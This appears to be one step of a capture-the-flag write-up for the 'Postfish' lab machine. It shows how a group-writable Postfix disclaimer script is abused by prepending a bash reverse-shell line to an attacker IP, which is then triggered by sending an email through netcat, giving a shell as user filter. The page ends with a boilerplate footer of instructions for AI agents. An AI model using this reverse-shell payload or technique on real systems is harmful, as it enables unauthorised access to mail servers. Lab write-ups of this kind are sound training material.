# 8 exploit /etc/postfix/disclaimer ``` # as this file is writble by group filter brian.moore@postfish:~$ ls -la /etc/postfix/disclaimer -rwxrwx--- 1 root filter 1184 Aug 25 00:39 /etc/postfix/disclaimer # we are a part of group filter brian.moore@postfish:~$ id uid=1000(brian.moore) gid=1000(brian.moore) groups=1000(brian.moore),8(mail),997(filter) # updat /etc/postfix/disclaimer to top of file bash -i >& /dev/tcp/192.168.49.175/6969 0>&1 # either restart service # or send email to get shell brian.moore@postfish:/etc/postfix$ service postfix restart ==== AUTHENTICATING FOR org.freedesktop.systemd1.manage-units === Authentication is required to restart 'postfix.service'. Authenticating as: root Password: # cannot restart service; as its run by root # sending email $ nc -vn 192.168.175.137 25 (UNKNOWN) [192.168.175.137] 25 (smtp) open 220 postfish.off ESMTP Postfix (Ubuntu) HELO x 250 postfish.off MAIL FROM: kashz 250 2.1.0 Ok RCPT TO: it@postfish.off 250 2.1.5 Ok DATA 354 End data with . YeeHaw! -$ . 250 2.0.0 Ok: queued as 656C0458FC $ nc -lvnp 6969 listening on [any] 6969 ... connect to [192.168.49.175] from (UNKNOWN) [192.168.175.137] 57334 bash: cannot set terminal process group (32777): Inappropriate ioctl for device bash: no job control in this shell filter@postfish:/var/spool/postfix$ whoami;id whoami;id filter uid=997(filter) gid=997(filter) groups=997(filter) ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kashz.gitbook.io/proving-grounds-writeups/pg-boxes/postfish/8-exploit-etc-postfix-disclaimer.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.